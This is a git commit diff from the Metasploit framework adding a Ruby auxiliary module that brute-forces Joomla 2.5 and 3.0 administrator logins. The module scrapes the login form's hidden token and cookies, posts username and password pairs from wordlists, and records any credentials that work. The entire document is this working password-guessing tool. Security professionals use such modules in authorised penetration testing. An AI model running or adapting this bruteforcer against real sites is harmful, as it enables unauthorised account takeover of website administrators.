Land rapid7#3532, @luisco's joomla login bruteforcer

jvazquez-r7 · jvazquez-r7 · commit fe0b6fa79e93 · 2014-07-21T12:56:15.000-05:00
diff --git a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb
@@ -0,0 +1,279 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'           => 'Joomla Bruteforce Login Utility',
+      'Description'    => 'This module attempts to authenticate to Joomla 2.5. or 3.0 through bruteforce attacks',
+      'Author'         => 'luisco100[at]gmail.com',
+      'References'     =>
+        [
+          ['CVE', '1999-0502'] # Weak password Joomla
+        ],
+      'License'        => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        OptPath.new('USERPASS_FILE', [false, 'File containing users and passwords separated by space, one pair per line',
+          File.join(Msf::Config.data_directory, 'wordlists', 'http_default_userpass.txt')]),
+        OptPath.new('USER_FILE', [false, 'File containing users, one per line',
+          File.join(Msf::Config.data_directory, 'wordlists', "http_default_users.txt")]),
+        OptPath.new('PASS_FILE', [false, 'File containing passwords, one per line',
+          File.join(Msf::Config.data_directory, 'wordlists', 'http_default_pass.txt')]),
+        OptString.new('AUTH_URI', [true, 'The URI to authenticate against', '/administrator/index.php']),
+        OptString.new('FORM_URI', [true, 'The FORM URI to authenticate against' , '/administrator']),
+        OptString.new('USER_VARIABLE', [true, 'The name of the variable for the user field', 'username']),
+        OptString.new('PASS_VARIABLE', [true, 'The name of the variable for the password field' , 'passwd']),
+        OptString.new('WORD_ERROR', [true, 'The word of message for detect that login fail', 'mod-login-username'])
+      ], self.class)
+
+    register_autofilter_ports([80, 443])
+  end
+
+  def find_auth_uri
+    if datastore['AUTH_URI'] && datastore['AUTH_URI'].length > 0
+      paths = [datastore['AUTH_URI']]
+    else
+      paths = %w(
+        /
+        /administrator/
+      )
+    end
+
+    paths.each do |path|
+      begin
+        res = send_request_cgi(
+          'uri'    => path,
+          'method' => 'GET'
+        )
+      rescue ::Rex::ConnectionError
+        next
+      end
+
+      next unless res
+
+      if res.redirect? && res.headers['Location'] && res.headers['Location'] !~ /^http/
+        path = res.headers['Location']
+        vprint_status("#{rhost}:#{rport} - Following redirect: #{path}")
+        begin
+          res = send_request_cgi(
+            'uri'     => path,
+            'method'  => 'GET'
+          )
+        rescue ::Rex::ConnectionError
+          next
+        end
+        next unless res
+      end
+
+      return path
+    end
+
+    nil
+  end
+
+  def target_url
+    proto = 'http'
+    if rport == 443 || ssl
+      proto = 'https'
+    end
+    "#{proto}://#{rhost}:#{rport}#{@uri}"
+  end
+
+  def run_host(ip)
+    vprint_status("#{rhost}:#{rport} - Searching Joomla authentication URI...")
+    @uri = find_auth_uri
+
+    unless @uri
+      vprint_error("#{rhost}:#{rport} - No URI found that asks for authentication")
+      return
+    end
+
+    @uri = "/#{@uri}" if @uri[0, 1] != '/'
+
+    vprint_status("#{target_url} - Attempting to login...")
+
+    each_user_pass do |user, pass|
+      do_login(user, pass)
+    end
+  end
+
+  def do_login(user, pass)
+    vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
+    response  = do_web_login(user, pass)
+    result = determine_result(response)
+
+    if result == :success
+      print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
+      report_auth_info(
+        :host         => rhost,
+        :port         => rport,
+        :sname        => (ssl ? 'https' : 'http'),
+        :user         => user,
+        :pass         => pass,
+        :proof        => target_url,
+        :type         => 'passsword',
+        :source_type  => 'cred',
+        :duplicate_ok => true,
+        :active       => true
+      )
+      return :abort if datastore['STOP_ON_SUCCESS']
+      return :next_user
+    else
+      vprint_error("#{target_url} - Failed to login as '#{user}'")
+      return
+    end
+  end
+
+  def do_web_login(user, pass)
+    user_var = datastore['USER_VARIABLE']
+    pass_var = datastore['PASS_VARIABLE']
+
+    referer_var = "http://#{rhost}/administrator/index.php"
+
+    vprint_status("#{target_url} - Searching Joomla Login Response...")
+    res = login_response
+
+    unless res && res.code = 200 && !res.get_cookies.blank?
+      vprint_error("#{target_url} - Failed to find Joomla Login Response")
+      return nil
+    end
+
+    vprint_status("#{target_url} - Searching Joomla Login Form...")
+    hidden_value = get_login_hidden(res)
+    if hidden_value.nil?
+      vprint_error("#{target_url} - Failed to find Joomla Login Form")
+      return nil
+    end
+
+    vprint_status("#{target_url} - Searching Joomla Login Cookies...")
+    cookie = get_login_cookie(res)
+    if cookie.blank?
+      vprint_error("#{target_url} - Failed to find Joomla Login Cookies")
+      return nil
+    end
+
+    vprint_status("#{target_url} - Login with cookie ( #{cookie} ) and Hidden ( #{hidden_value}=1 )")
+    res = send_request_login(
+      'user_var'     => user_var,
+      'pass_var'     => pass_var,
+      'cookie'       => cookie,
+      'referer_var'  => referer_var,
+      'user'         => user,
+      'pass'         => pass,
+      'hidden_value' => hidden_value
+    )
+
+    if res
+      vprint_status("#{target_url} - Login Response #{res.code}")
+      if res.redirect? && res.headers['Location']
+        path = res.headers['Location']
+        vprint_status("#{target_url} - Following redirect to #{path}...")
+
+        res = send_request_raw(
+          'uri'     => path,
+          'method'  => 'GET',
+          'cookie' => "#{cookie}"
+        )
+      end
+    end
+
+    return res
+    rescue ::Rex::ConnectionError
+      vprint_error("#{target_url} - Failed to connect to the web server")
+      return nil
+  end
+
+  def send_request_login(opts = {})
+    res = send_request_cgi(
+      'uri'     => @uri,
+      'method'  => 'POST',
+      'cookie'  => "#{opts['cookie']}",
+      'headers' =>
+        {
+          'Referer' => opts['referer_var']
+        },
+      'vars_post' => {
+        opts['user_var']     => opts['user'],
+        opts['pass_var']     => opts['pass'],
+        'lang'               => '',
+        'option'             => 'com_login',
+        'task'               => 'login',
+        'return'             => 'aW5kZXgucGhw',
+        opts['hidden_value'] => 1
+      }
+    )
+
+    res
+  end
+
+  def determine_result(response)
+    return :abort unless response.kind_of?(Rex::Proto::Http::Response)
+    return :abort unless response.code
+
+    if [200, 301, 302].include?(response.code)
+      if response.to_s.include?(datastore['WORD_ERROR'])
+        return :fail
+      else
+        return :success
+      end
+    end
+
+    :fail
+  end
+
+  def login_response
+    uri = normalize_uri(datastore['FORM_URI'])
+    res = send_request_cgi!('uri' => uri, 'method' => 'GET')
+
+    res
+  end
+
+  def get_login_cookie(res)
+    return nil unless res.kind_of?(Rex::Proto::Http::Response)
+
+    res.get_cookies
+  end
+
+  def get_login_hidden(res)
+    return nil unless res.kind_of?(Rex::Proto::Http::Response)
+
+    return nil if res.body.blank?
+
+    vprint_status("#{target_url} - Testing Joomla 2.5 Form...")
+    form = res.body.split(/<form action=([^\>]+) method="post" id="form-login"\>(.*)<\/form>/mi)
+
+    if form.length == 1  # is not Joomla 2.5
+      vprint_status("#{target_url} - Testing Form Joomla 3.0 Form...")
+      form = res.body.split(/<form action=([^\>]+) method="post" id="form-login" class="form-inline"\>(.*)<\/form>/mi)
+    end
+
+    if form.length == 1 # is not Joomla 3
+      vprint_error("#{target_url} - Last chance to find a login form...")
+      form = res.body.split(/<form id="login-form" action=([^\>]+)\>(.*)<\/form>/mi)
+    end
+
+    begin
+      input_hidden = form[2].split(/<input type="hidden"([^\>]+)\/>/mi)
+      input_id = input_hidden[7].split("\"")
+    rescue NoMethodError
+      return nil
+    end
+
+    valor_input_id = input_id[1]
+
+    valor_input_id
+  end
+
+end
